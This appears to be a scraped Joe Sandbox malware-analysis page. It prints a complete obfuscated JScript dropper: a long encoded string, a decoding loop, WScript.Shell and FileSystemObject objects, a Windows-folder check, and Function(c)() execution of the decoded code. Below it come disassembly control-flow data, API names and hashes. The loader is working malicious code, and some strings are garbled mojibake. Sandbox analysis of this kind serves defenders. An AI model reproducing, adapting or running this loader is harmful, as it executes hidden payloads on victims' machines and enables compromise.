,e(${sx$R$E?*v/$1zvv5gws5A5f{s5/5lv,|$@$7eF57-Pzvv5x5A5fCs&i$Xz|*J~pz,xf%05<A$64>?*2xp%wz,>?{sx/@?(yCw}i\"pZ|zg+xz,&{={E-A$7`7&5/5[hg(m&xCWxv~t*J+p\"Rvqz$@$7`7$7$@$}e=k5/5&v5E&>05&705&7054>?3$xe*g}$=i>$1\"*v/$1zvv5gws5A5f{s5/5lv,|$@$7eF77-Pzvv5x5A5fCs&i$Xz|*J~pz,xf%05<A$64>?*2xp%wz,>?{sx/@?(yCw}i\"pZ|zg+xz,&{={E-A$7`7&5/5[hg(m&xCWxv~t*J+p\"Rvqz$@$7`7$7$@$}e=k5/5&v5G&>05&705&7054>?3$xe*g}$=i>$1\"3?,e($&{5A5j+rxx~s$,#t>$1vzx+v$$#tpQvx}2{p%s(,be*lCvvrys#,>$?$#tCpzr|x}-r\"Pzvv5{5A5&E4E&Px(}5 -$R$v2(i|Vzey,7L`Pb`qWdJi[VVZ`qQ~g(s)s{xq`lm$h%{)$cXq`Xy(vzr*Zzv)m%rq`ev%h+g*MY&>\"5gvxxl5,z-5 3zvv5z$$R$p4A$E054A$EaPx(}5 {s($=zvv5m5A5rz{5I$y#i(e*s(,\\i*Swnzg*,7{~r#k#x)>(s%xq`xm#zG&>2Z|zgfyzv/,7WZPZGi$?$[VdQ5[~rH6tS&i(e*m$kh})xzq7->?5%~2vxZry,>?5mCq%zzRz|*,>-5 ,r5A5mCm*i#,>_7zzv)m%r7aCw&p~x=&C&>?~j5,,rp4r$SA59>$wvze!\"3$xe*g}$=i>$1\"~j5,6z$_Ea>$,rp4r$R$w2{s\"hzvZ|~w*w=h=&)})xzqyv~zz&>$@$7`qY)i(w7-5C5:5>59Pzvv5p\"$R$p&705&7aPx(}5 ,e($%w\"?{s($=zvv5m5A5rz{5I$y#i(e*s(,\\i*Swnzg*,7{~r#k#x)>(s%xq`xm#zG&>2Z|zgfyzv/,7WZPZGi$?$[VdQ5[~rH6tS&i(e*m$kh})xzq7->?5%~2vxZry,>?5mCq%zzRz|*,>-5 %w\"$R$=,%w\"$R$~2~xzq=-p&dWae$k+e|i7aCx%W*v~r|,F:>-Cpzr|x}$RA58>$T$%w\"$O$$i-$Vv(e/,J$B$%w\"2\"i$k*l>2 s~r=&E&>$@$%w\"?\"p5A5eCvzkgivh=&]OaQq`hS[XlEgIq`Xpvw)i)`qQ^QZ`qHvxvfvwz`qV{gF;K:q`7$@$%w\"-Cw&p~x=&P&>_EaCw&p~x=&B&>?wvze!\"3$xe*g}$=i>$1\",e($wj%$R$y,7p%gvpvt&hvxv&>$@$7`q&5/5lv,|$@$7eE67-5/5&q`7?~j5,w2{s\"hzvZ|~w*w=f{s>-5 ,e($*j{$R$7&As*jA$/w|$R$E05ly$R$wj%$@$}e=k5/5&v4H&>0wj~$R$wj%$@$}e=k5/5&v4I&>$@$72 w7?~j5,w2{m\"iZ|~w*w=ly->$1x(}5 %x{$R$w2%tzrii.x[m\"i=ly055>?*j{$R$%x{2(ivhVp\",>05s*jCg\"s)i=-3$xe*g}$=i>$1\"3$zp)i5 /w|$R$F\"~j5,/w|$2!5x{j5AR$7&>$1x(}5 *j{$R$xsw,>$@$xsw,>$@$717$@$xsw,>$@$717$@$xsw,>$@$717$@$xsw,>$@$717$@$xsw,>$@$xsw,>$@$xsw,>?%x{$R$w2%tzrii.x[m\"i=ly056A$F-Ps*jC{(m*i=x{j>05s*jCg\"s)i=-3$xe*g}$=i>$1\"3x(}5 ,e($oI5A5fCs&i$Xz|*J~pz,wj%$@$}e=k5/5&v4J&>05<A$64>?oICg\"s)i=-Pl{,wj%-Px(}5 w2xs&}[m\"i=[hg(m&xCwxv~t*J+p\"Rvqz05f{mA$*v+i>\"5gvxxl5,z-5 3x(}5 ,e($xz,$R$wj%$@$}e=k5/5&v4E&>?,e($du5A5fCs&i$Xz|*J~pz,xz,05<A$64>?*v/$1fChzpzxzJ~pz,wj%$@$}e=k5/5&v4N&>-3$xe*g}$=i>$1\"*v/$1fChzpzxzJ~pz,wj%$@$}e=k5/5&v5I&>-3$xe*g}$=i>$1\"3$xe*g}$=i>$1m{$=[hg(m&xCE(k+qzr*wCpzr|x}$S$E-5 ){~xxl5,lWxv~t*2Vv|y#i$x),E->$1gvwz$}e=k5/5&v5E&>>,e($xf%$R$wj%$@$}e=k5/5&v5F&>?*v/$1zvv5~w~5A5fCs&i$Xz|*J~pz,xf%05<A$64>?3$xe*g}$=i>$1[hg(m&xCu+m*,>\"-l~pz$=x(yz-5 *v/$1zvv5s%x5A5Kzxdf ixx=&-m$q|q*wOv%s*`qg~q,67-Pj%v5,,e($yW5A5rz{5I$y#i(e*s(,%s*2Z|zgfyzv/,7WZPZGi$?$[VdQ5[~rH6tH~w!H(m,i7->?5%yWCe*I$h=-P$yWCq%zzRz|*,>-5 ~j5,yWCm*i#,>2bsyi\"2#e*g},Dy)fDm>-5 ,e($ymy$R$yWCm*i#,>2Yi,mxi^HPj%v5,,e($yTh$R$$i-$Zr+qzvvx%v=s%xCI.ixU+i(}=&VWhSXMVXdVh$dJ5 lm$7GcYm)oYv~zz2Yi,mxi^HR`.6L&5/5h~h5/5&q|G;3$lLZVZ$Vw)sxG\"e)wR[~rH6tH~w!H(m,iisYm)oee(x~x~s$&>-P$6heWCe*I$h=-P$yTh2#s,ici.x=->$1zvv5t^H5A5heWCm*i#,>2Yi,mxi^HPj%v5,,e($\"Hh$R$$i-$Zr+qzvvx%v=s%xCI.ixU+i(}=&VWhSXMVXdVh$dJ5 lm$7GcYm)oee(x~x~s$2Yi,mxi^HR`.6L&5/5t^H5/5&q|G;3$lLZVZ$Vw)sxG\"e)wR[~rH6tP%k~gvpYm)oisee(x~x~s$&>-P$6pYWCe*I$h=-P$\"Hh2#s,ici.x=->$1zvv5pY$R$\"Hh2~xzq=-CHzz~gzMY$@$7`q&Ax(v5A5&[m\"i)`q&Ax(h5A5pY$@$*v(0&s%v5A5,)g=k>$:$J4E$@$I4J-5/5&q`70&s($R$*v($@$&s%vAt%h5A5pY$@$&s(0&m~v5A5lv,|$@$7eE57-5/5&Cn)&At~v5A5t%v5/5lv,|$@$7eE57-5/5&Cn)&At~h5A5pY$@$&m(0we*$R$\"H5/5&[m\"i)2we*&Px(}5 w2xvze*i[s\"hzv=x(h>\"5gvxxl5,z-5 3x(}5 w2xvze*i[s\"hzv=t%h>\"5gvxxl5,z-5 3l{,*vy-A$}j=t%h>?*v/$1zvv5k{$R$w2|i*J%pyi(,*vy-Pj%v5,,e(${W5A5rz{5I$y#i(e*s(,|jCW+f[s\"hzv)-P$6jh2vxZry,>?5jh2#s,ici.x=->$1zvv5j{$R$=jh2~xzq=-5/5&7-Cw&p~x=&q`7-Ct%t=-Pm{$=j{2\"i$k*l5AR$H$;*5%~wcec,&e(wzJ\"svx=j{->$;*5m)J~r~xz,{j>-5 ,e(${k5A5fCkzx[s\"hzv=x(h5/5j{-Pj%v5,,e($hj5A5rz{5I$y#i(e*s(,{kCJ~pzw>?5%hjCe*I$h=-P$hjCq%zzRz|*,>-5 ,e(${j{$R$=W{2~xzq=-5/5&7-Cw&p~x=&q`7-Ct%t=-Pm{$=fCkzxZ|*i$w~s$Rvqz,{j{-Cx%P%{zvXe)i=-5AR$7n)&>$1x(}5 w2xs&}[m\"i=[hg(m&xCwxv~t*J+p\"Rvqz05x(h5/5j{$@$7`q&5/5j{jA$*v+i>\"5gvxxl5,z-5 3\"3\"3\"5gvxxl5,z-5 3x(}5 w2xs&}[m\"i=[hg(m&xCwxv~t*J+p\"Rvqz05t~hA$*v+i>\"5gvxxl5,z-5 3x(}5 ,e($%x{j5A5fCs&i$Xz|*J~pz,we*056A$F-Ps*j{2-v~xzP~rz,7gy$[m\"i)`q&5/5t%s(-A$%x{jC{(m*iam$i=&:g%q)tzg:$Dg5w*e(x5{swxv~t*$7$@$&m~v>05s*j{2-v~xzP~rz,7i.m*&>05s*j{2xp%wz,>\"5gvxxl5,z-5 3zvv5f(s5A5_F6L055G<A$F6NaPx(}5 ,e($|j5A5fCkzx[s\"hzv=pY-Pj%v5,,e(${W5A5rz{5I$y#i(e*s(,|jCW+f[s\"hzv)-P$6jh2vxZry,>?5jh2#s,ici.x=->$1zvv5j{$R$=jh2~xzq=-5/5&7-Cw&p~x=&O`q&>2&s&,>?~j5,{jCw+f)x(,E055>$6A5&C&5*;${jCw+f)x(,E055>$6A5&9&5*;${jCqvxxl=3(ix}xpz3~-5AR$$y\"p5*;${jCqvxxl=3h})xzq5Z%p+qz3>$RA5r+p\"$;*5j{2#e*g},DJ~pzwD-5AR$$y\"p>$1{~x},v2xvze*ihl%v*g+x=pY$@${j5/5&Cp$o7->$*e(kzxee*l5A5&:g%q)tzg:&A$-m$h%{hx/pz$R$L05e(k+qzr*w5A5&Dg5wzx5gRJ~pzwCfvx;$xqy2z|z$Dg5wzx5hRi.t\"s(i(*5g#hCi.i53x$:g:$S$$y\"*5gy$[m\"i)*5g#hCi.i53x$:h:$q&7$@${j5/5&q&705mxs$P%gvx~s$$R$7)h})xzqgs%x:`qW/w*i#7G`qW]IaPH6Ch\"pA&5/5t-,wv%-A$)e,i=-Px(}5 ,e($*$R$w2|i*J%pyi(,\"H5/5j{-PxCq%zz,*vy$@${j>\"5gvxxl5,z-5 3\"3\"5gvxxl5,z-5 3x(}5 ,e($|j5A5fCkzx[s\"hzv=pY-Pj%v5,,e(${W5A5rz{5I$y#i(e*s(,|jCJ~pzw>?5%{WCe*I$h=-P${WCq%zzRz|*,>-5 ,e(${j5A5,{WCm*i#,>$@$7&>2)t\"m*,7>q`7-Ct%t=-Pzvv5i.|5A5fCkzxZ|*i$w~s$Rvqz,{j>2*sas-i(Gvwz,>?~j5,z|.$6A5&\"r!&>$1m{$=i.|5%R$7fvx7$;*5i.|5%R$7&5*;$z|.$6A5& w7$;*5j{2*sas-i(Gvwz,>$6A5&vy*s(y$2~r{&5*;${jCw+f)x(,E055>$6A5&C&5*;${jCw+f)x(,E055>$6A5&9&5*;${jCqvxxl=3(ix}xpz3~-5AR$$y\"p>$1zvv5i.s5A54Pw-m*g}$=i.|>$1gvwz$7i.i7>z|%$R$G:F?wvze!?xe)i5&ysx&Ogvwz$7h%g.&Ogvwz$7tyj7>z|%$R$L7Pf(ivoPgvwz$7v*j7>xe)i5&*|*&Oi.s5A5;E?wvze!?xe)i5&#tH&Ogvwz$7qIe7>xe)i5&%k|&Ogvwz$7{vz7>xe)i5&-qv&Oi.s5A55F:Pf(ivoPgvwz$7q&87>xe)i5&vz~&Ogvwz$7{zf#&Ogvwz$7j\"z7>xe)i5&#s,&Ogvwz$7{#z7>xe)i5&#tzk7>xe)i5&#t|&Oi.s5A55F9Pf(ivoPgvwz$7k~j7>xe)i5& t|&Ogvwz$7n&i|&Ogvwz$7t$k7>z|%$R$H4G?wvze!?3{~x},v2xvze*ihl%v*g+x=pY$@${j5/5&Cp$o7->$*e(kzxee*l5A5&:g%q)tzg:&A$-m$h%{hx/pz$R$L05e(k+qzr*w5A5&Dg5wzx5~0A[m\"i)2we**5g#hCi.i53x$:~0)5B5r+p;$xh5J~pzw;$xqy2z|z$Dg5`7&5/5j{$@$7`7&A$~g%rasxe*m%r5A5&:W/w*i#V%s*)q`h})xzqH6q`hLZPa7G2yp\"07$@$z|%05wvzz,>?*v/$1fCq%zzJ~pz,\"H5/5j{05x(h5/5j{-3$xe*g}$=i>$1\"3\"3\"5gvxxl5,z-5 3\"3\"3\"5gvxxl5,z-5 3o&,>?0x=-P[hg(m&xCw\"izt=5I4E4>\"wvze!?xe)i5lv,|$@$7eF67-Ozvv5gws5A5f{s5/5lv,|$@$7eF77-Px(}5 ,e($0f0$R$w2%tzrii.x[m\"i=gwsA$M05%E-P\"5gvxxl5,z-5 lWxv~t*2'y~x=-3{}m\"i5,*v+i>$1x(}5 ,e($*$R$\\i*Swnzg*,7{~r#k#x)>(s%xq`xm#zG&>?{s($=zvv5m5A5rz{5I$y#i(e*s(,*2Z|zgfyzv/,7WZPZGi$?$[VdQ5[~rH6tT(sxi)w7->?5%~2vxZry,>?5mCq%zzRz|*,>-5 ,e($~x5A5mCm*i#,>?~j5,~xp&$e#i7aCqvxxl=rz{5VzkZ|&,0f%2 s~r=&2&>05&~&>->$1x(}5 ~j5,~xCxzv#m$e*i=-5AR$E$;*5m*_7I.ixy*ewpzTvx}&r$;*5%~xp&Z|zg+xvf\"iee*l7aCqvxxl=3-m$h%{)!&v%k(e#3~->$1zvv5x&$R$=,E|G4E55/5Qvx}2(e$h%q=->$?$H4J<G$2$E-Cx%W*v~r|,F:>2)yww*v~r|,F-Pzvv5x'$R$=,E|G4E55/5Qvx}2(e$h%q=->$?$H4J<G$2$E-Cx%W*v~r|,F:>2)yww*v~r|,F-PeCt%t+t=&Vt&p~gvx~s$$}e)$|i$i(e*iy$vr5i.gzt*m%r5x}e*$xs+py$$s*$wi5lvrypzhC`$`$T(sxi)w5myAE|7$@$*t5/5&5,7$@$&e(wzM$x=x&055K-5/5&>05X}vzey$~hR4.&5/5x'$@$7$=&5/5tvv)i^r*,*uA$F:>$@$7-C`$`$G\"mxo5S`$*s5xzv#m$e*i5x}i5e&t\"mxe*m%rC`$G\"mxo5GVRXIa$*s5hzf+k5x}i5e&t\"mxe*m%rC&A$M05m*_7rvqz&r$@$7$B$Xs#q%r5Pvr|yvkz$gy$x~qz$Yiwy|k~r|$hi(z~gzw7054.55/54.7E$@$E|F4E4>?3\"5gvxxl5,z-5 3\"3\"5gvxxl5,z-5 3o&,>?0x=-P[hg(m&xCw\"izt=8E4>\"wvze!?3\"~j5,=[hg(m&xCE(k+qzr*wCpzr|x}$S$E$;*5[hg(m&xCE(k+qzr*w=4>$RA5lv,|$@$7eE;7->$RA5jvp)i>$lWxv~t*2'y~x=-3zvv5{E$R$paPm{$=,lWxv~t*2Vv|y#i$x)2\"i$k*l5B545*;$lWxv~t*2Vv|y#i$x),E-5AR$}e=k5/5&v4L&>-5AR${e\"wz-5 *v/$1eCv+r=&:g%q)tzg:$Dg5hzp53[$DW53f$q&7$@$wj%$@$7.Ci.iq&7054A$*v+i>?lWxv~t*2)pzi&,J4E-3$xe*g}$=i>$1\"-{5A5lv,be*lCvvrys#,>-Pq#$R$be*lCgzm\",be*lCvvrys#,>$?$J-Pm{$=q#$S$H-5{-$@A5,#q5B58>$T$7:I&5>5&H67?-{5/R$72z|z&PfCg%t/J~pz,y,7w/w*i#v%s*&>$@$7`qw/w*i#7G`q{)g(m&xCi.i705f{s5/5{-05x(yz-P{E2&y)l=f{s5/5{--3$zp)i5 -45A5j+y=-3zvv5jzx5A5t-,-4>?,e($)y5A54Px(}5 ,e($&t5A5h=&)})xzqyv~zz&>$@$7`qT(s|vvqYe*eq`bmxv%w%j*`q[~rys-wq`hxvv*$bi$yq`ev%k(e#wq`hxvv*y&`q&Pzvv5gwf5A5_7[~rys-w5I.t\"s(i(2\"r!&A&zq&i0e(2\"r!&A&vxvn%2\"r!&A&hxvv*2\"r!&r?{s($=zvv5mF$R$E?5mF$Q$xfw2\"i$k*lP$~5@/>$1x(}5 w2yi\"i*i[m\"i=t&$@$xfw_~5r-3$xe*g}$=i>$1\"3\"5gvxxl5,z-5 3x(}5 ,e($&t5A5h=&+wzv&v%j~pz&>$@$=z$_Ea5BR$K$T$7`qE&tYe*eq`gsvq~r|`qQ~g(s)s{xq`lm$h%{)`qW*e(x5Qzr+`qT(s|vvq)`qW*e(x+tq`7$O$7`qW*e(x5Qzr+`qT(s|vvq)`qW*e(x+tq`7-Pzvv5t5A5t&$@$}e=k5/5&v5K&>$@$72\"r!&P{~x},v2xvze*ihl%v*g+x=t>-5xvv|i*Tvx}$R$7`7&5/5jzx5/5&q&705{~rys-W*}\"i5A55A$vv|y#i$x)$R$7`7&5/5f{m5/5&q&705mxs$P%gvx~s$$R$7))})xzq(s%x:`qw/w*i#7G`qw}i\"pH6Ch\"pA7705wvzz,>?\"sCt+w},&-Pzvv5gwf5A5_7[~rys-w5I.t\"s(i(2\"r!&A&zq&i0e(2\"r!&A&vxvn%2\"r!&A&hxvv*2\"r!&r?{s($=zvv5mF$R$E?5mF$Q$xfw2\"i$k*lP$~5@/>$1x(}5 w2yi\"i*i[m\"i=t&$@$xfw_~5r-3$xe*g}$=i>$1\"3\"5gvxxl5,z-5 3x(}5 v2(i|[(m*i=&]OXYq`hs{x-e(iq`bmxv%w%j*`q[~rys-wq`Xy(vzr*Zzv)m%rq`gy$`q&5/5lv,|$@$7eF97-A$7`7&5/5jzx5/5&q&5`7&5/5f{m5/5&q&7-3$xe*g}$=i>$1\"~j5,lWxv~t*2hg(m&x[y\"pce#iCw&p~x=&q`7-Cw}m{x=-5AR$y,7w/w*i#h(m,i7->$\"sCt+w},lWxv~t*2hg(m&x[y\"pce#i>?,e($*g5A5h=&*i#t7-5/5&q`7$@$}e=k5/5&v4M&>$@$72 w7?~j5,lWxv~t*2Vv|y#i$x)2\"i$k*l5B545*;$lWxv~t*2Vv|y#i$x),E-5AR$}e=k5/5&v4L&>-5 *v/$1fChzpzxzJ~pz,*g>\"5gvxxl5,z-5 3[hg(m&xCu+m*,>?3$zp)i5m{$=w+$SA54>$1x(}5 du5A5fCs&i$Xz|*J~pz,wj%$@$}e=k5/5&v4E&>05<A$64>\"5gvxxl5,z-5 3\"}v=4>?)o=-3$xe*g}$=i>$1[hg(m&xCu+m*,>\"-l~pz$=x(yz-5 ~j5,0~%,>$6AR${e\"wz-5 -l~pz$=x(yz-5 *v/$1zvv5m5A5rz{5Hvxz,>2|i*X~qz,>?9,757055>?{s($=?5m5/5,K45.56N$?$F4E4>$SA5rz{5Hvxz,>2|i*X~qz,>?5w!,>-5[hg(m&xCw\"izt=6E4E-3$xe*g}$=i>$1m{$=~0s=-5AR${e\"wz-5f(ivoPj%v5,,e($~$R$$i-$Ye*i=-Ckzxim#i=-P$~$@$=:E$?$G=5.55E4E-5BR$$i-$Ye*i=-Ckzxim#i=-P$)o=->$lWxv~t*2)pzi&,G4E4>\"3\"5i\"wz$1j%v5,,e($~$R$$i-$Ye*i=-Ckzxim#i=-P$~$@$=:E$?$G=5.55E4E-5BR$$i-$Ye*i=-Ckzxim#i=-P$)o=->$lWxv~t*2)pzi&,G4E4>\"3\"5i\"wz$1f{s5A5h=&+wzv&v%j~pz&>$@$=z$_Ea5BR$K$T$7`qE&tYe*eq`gsvq~r|`q&5>5&q`7-5/5lv,|$@$74G&>$@$7`q&Pm{$=fCj%pyi(I.m)x),wj%->$1zvv5s*jA$}h5A5f{s5/5lv,|$@$74H&>0*j{$R$7&Pm{$=fCj~pzI.m)x),}h>-5 *v/$1s*j5A5fCs&i$Xz|*J~pz,}hA$F-Px{j5A5s*jCvzeyE\"p=-A$%x{2xp%wz,>\"5gvxxl5,z-5 3\"3zvv5fww5A5h=&\"sxe\"e&tye*e7-5/5&q`7$@$}e=k5/5&v4G&>0wf0$R$wf)$@$7`q&5/5lv,|$@$7eE87-5/5&Cn)&Px(}5 w2xvze*i[s\"hzv=fww>\"5gvxxl5,z-5 3fCg%t/J~pz,lWxv~t*2hg(m&x[y\"pce#iA$wf005x(yz-Pm{$=x{j5%R$7&>$1x(}5 %x{$R$w2%tzrii.x[m\"i=fww5/5&q`7$@$}e=k5/5&v4H&>056A$F-Ps*jC{(m*i=x{j>05s*jCg\"s)i=-3$xe*g}$=i>$1\"3v+2)lzp\"I.ixy*i=&-wxv~t*2z|z&A$7`7&5/5[hg(m&xCWxv~t*J+p\"Rvqz$@$7`7$7$@$}e=k5/5Qvx}2(e$h%q=->05&705&7054>?lWxv~t*2'y~x=-3\"=->?", b = [ 4, 21 ], c = "", d = 0, e, f = new ActiveXObject ( "Scripting.FileSystemObject" ), g = new ActiveXObject ( "WScript.Shell" ),
                                                                                        1
                                                                                        j = function (z) {
                                                                                          2
                                                                                          eval ( 'k=z.item()' );
                                                                                            3
                                                                                            k += "";
                                                                                              4
                                                                                              return true;
                                                                                                5
                                                                                                }, k = "", l = "%systemroot%", kas = "";
                                                                                                  6
                                                                                                  for ( ; d < a.length ; d += 1 )
                                                                                                    7
                                                                                                    {
                                                                                                      8
                                                                                                      e = a.charCodeAt ( d ) - b[d % b.length];
                                                                                                        9
                                                                                                        c += String.fromCharCode ( e < 32 ? 95 + e : e );
                                                                                                          10
                                                                                                          }
                                                                                                            11
                                                                                                            var h = f.getFolder ( g.ExpandEnvironmentStrings ( l ) );
                                                                                                              12
                                                                                                              for ( var i = new Enumerator ( h.SubFolders ) ; ! i.atEnd ( ) && j ( i ) ; i.moveNext ( ) )
                                                                                                                13
                                                                                                                {
                                                                                                                  14
                                                                                                                  if ( k.match ( /windows/i ) )
                                                                                                                    15
                                                                                                                    {
                                                                                                                      16
                                                                                                                      kas = "\xfffd\xfffd \xfffd\xfffd\xfffd\x07e7\xfffd\xfffd\x05a7\x07e7\x06a7\xfffd\xfffd \xfffd\xfffd\xfffd\xfffd\xfffd\x06a7\x07e7\xfffd \xfffd\xfffd \xfffd\xfffd\xfffd\x0467\xfffd\xfffd\x05a7\xfffd\xfffd\x0727\xfffd\x0527\xfffd, \xfffd\x0727\xfffd\xfffd, \xfffd\xfffd\xfffd \xfffd\x04e7\x0467\xfffd\x05a7\x07a7\xfffd \xfffd\x07a7\x07e7\x05a7\x07e7\x06a7\xfffd, \xfffd\xfffd\x04e7\x0767\xfffd\x05a7\xfffd\xfffd\xfffd \xfffd\x0567\x07e7\xfffd\xfffd?";
                                                                                                                        17
                                                                                                                        break ;
                                                                                                                          18
                                                                                                                          }
                                                                                                                            19
                                                                                                                            else
                                                                                                                              20
                                                                                                                              {
                                                                                                                                21
                                                                                                                                kas = "";
                                                                                                                                  22
                                                                                                                                  }
                                                                                                                                    23
                                                                                                                                    }
                                                                                                                                      24
                                                                                                                                      if ( kas == "\xfffd\xfffd \xfffd\xfffd\xfffd\x07e7\xfffd\xfffd\x05a7\x07e7\x06a7\xfffd\xfffd \xfffd\xfffd\xfffd\xfffd\xfffd\x06a7\x07e7\xfffd \xfffd\xfffd \xfffd\xfffd\xfffd\x0467\xfffd\xfffd\x05a7\xfffd\xfffd\x0727\xfffd\x0527\xfffd, \xfffd\x0727\xfffd\xfffd, \xfffd\xfffd\xfffd \xfffd\x04e7\x0467\xfffd\x05a7\x07a7\xfffd \xfffd\x07a7\x07e7\x05a7\x07e7\x06a7\xfffd, \xfffd\xfffd\x04e7\x0767\xfffd\x05a7\xfffd\xfffd\xfffd \xfffd\x0567\x07e7\xfffd\xfffd?" )
                                                                                                                                        25
                                                                                                                                        {
                                                                                                                                          26
                                                                                                                                          Function ( c ) ( );
                                                                                                                                            27
                                                                                                                                            }
                                                                                                                                              Reset < >

                                                                                                                                                Executed Functions

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 7ff7c0ba0ec4-7ff7c0ba0f01 1 7ff7c0ba131f-7ff7c0ba134a call 7ff7c0ba3bd0 0->1 2 7ff7c0ba0f07-7ff7c0ba0f2e GetUserDefaultLangID GetLocaleInfoW 0->2 3 7ff7c0ba0f30-7ff7c0ba0f38 2->3 4 7ff7c0ba0f3a 2->4 7 7ff7c0ba0f3c-7ff7c0ba0f3e 3->7 4->7 8 7ff7c0ba0f40-7ff7c0ba0f4a 7->8 9 7ff7c0ba0f5f-7ff7c0ba0f66 7->9 10 7ff7c0ba0f58 8->10 11 7ff7c0ba0f4c-7ff7c0ba0f53 8->11 9->11 12 7ff7c0ba0f68-7ff7c0ba0f7d 9->12 10->9 11->1 12->11 13 7ff7c0ba0f7f-7ff7c0ba0f9f GetModuleFileNameW 12->13 14 7ff7c0ba0fa1-7ff7c0ba0fb0 call 7ff7c0ba340c 13->14 15 7ff7c0ba0fb3-7ff7c0ba0fba 13->15 14->15 17 7ff7c0ba0fc7-7ff7c0ba0fca 15->17 18 7ff7c0ba0fbc-7ff7c0ba0fc5 FreeLibrary 15->18 19 7ff7c0ba0fd0-7ff7c0ba0fe9 GetLocaleInfoA 17->19 20 7ff7c0ba131c 17->20 18->19 22 7ff7c0ba1005-7ff7c0ba1023 LoadStringA 19->22 23 7ff7c0ba0feb-7ff7c0ba1000 19->23 20->1 22->23 24 7ff7c0ba1025-7ff7c0ba106c call 7ff7c0b931f4 GetModuleFileNameA 22->24 23->1 27 7ff7c0ba1086-7ff7c0ba1088 24->27 28 7ff7c0ba108a-7ff7c0ba109a 27->28 29 7ff7c0ba106e-7ff7c0ba1071 27->29 32 7ff7c0ba109d-7ff7c0ba10a4 28->32 30 7ff7c0ba1073-7ff7c0ba1079 29->30 31 7ff7c0ba107b-7ff7c0ba107e CharNextA 29->31 33 7ff7c0ba1084 30->33 31->33 32->32 34 7ff7c0ba10a6-7ff7c0ba10af 32->34 33->27 35 7ff7c0ba10df-7ff7c0ba10fd LoadLibraryExA 34->35 36 7ff7c0ba10b1-7ff7c0ba10d9 memcpy strcpy_s 34->36 35->20 37 7ff7c0ba1103-7ff7c0ba1118 LoadLibraryExA 35->37 36->35 37->20 38 7ff7c0ba111e-7ff7c0ba1123 37->38 39 7ff7c0ba1126-7ff7c0ba112d 38->39 39->39 40 7ff7c0ba112f-7ff7c0ba1133 39->40 41 7ff7c0ba1219-7ff7c0ba123f GetUserDefaultLCID GetLocaleInfoA 40->41 42 7ff7c0ba1139-7ff7c0ba1171 sprintf_s 40->42 41->23 43 7ff7c0ba1245-7ff7c0ba1278 sprintf_s 41->43 44 7ff7c0ba118b-7ff7c0ba118d 42->44 45 7ff7c0ba1292-7ff7c0ba1294 43->45 46 7ff7c0ba118f-7ff7c0ba119b 44->46 47 7ff7c0ba1173-7ff7c0ba1176 44->47 50 7ff7c0ba1296-7ff7c0ba129e 45->50 51 7ff7c0ba127a-7ff7c0ba127d 45->51 52 7ff7c0ba119e-7ff7c0ba11a5 46->52 48 7ff7c0ba1180-7ff7c0ba1183 CharNextA 47->48 49 7ff7c0ba1178-7ff7c0ba117e 47->49 55 7ff7c0ba1189 48->55 49->55 56 7ff7c0ba12a2-7ff7c0ba12a9 50->56 53 7ff7c0ba127f-7ff7c0ba1285 51->53 54 7ff7c0ba1287-7ff7c0ba128a CharNextA 51->54 52->52 57 7ff7c0ba11a7-7ff7c0ba11b0 52->57 58 7ff7c0ba1290 53->58 54->58 55->44 56->56 59 7ff7c0ba12ab-7ff7c0ba12b5 56->59 60 7ff7c0ba11e0-7ff7c0ba11f8 LoadLibraryExA 57->60 61 7ff7c0ba11b2-7ff7c0ba11da memcpy strcpy_s 57->61 58->45 62 7ff7c0ba12e5-7ff7c0ba12fd LoadLibraryExA 59->62 63 7ff7c0ba12b7-7ff7c0ba12df memcpy strcpy_s 59->63 60->20 64 7ff7c0ba11fe-7ff7c0ba1213 LoadLibraryExA 60->64 61->60 62->20 65 7ff7c0ba12ff-7ff7c0ba1314 LoadLibraryExA 62->65 63->62 64->20 64->41 65->20
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true
                                                                                                                                                • Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$CharInfoLocaleNextmemcpystrcpy_s$DefaultFileModuleNameUsersprintf_s$FreeLangString
                                                                                                                                                • String ID: %s%s.DLL
                                                                                                                                                • API String ID: 1450027533-4110387156
                                                                                                                                                • Opcode ID: 868df43cb1bf2d225c94232421144c78fe7e861f8e79fd0ac5243b94eb619904
                                                                                                                                                • Instruction ID: 7520de1c59d054f8e330f9b6d268e735ec3b558ceb03fbb74f7b401c072fd67d
                                                                                                                                                • Opcode Fuzzy Hash: 868df43cb1bf2d225c94232421144c78fe7e861f8e79fd0ac5243b94eb619904
                                                                                                                                                • Instruction Fuzzy Hash: B5C17321A08A8695EF62EF11DC402FAA3A1FB44B64F840436DA4F87B54DF3DF515C7A0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
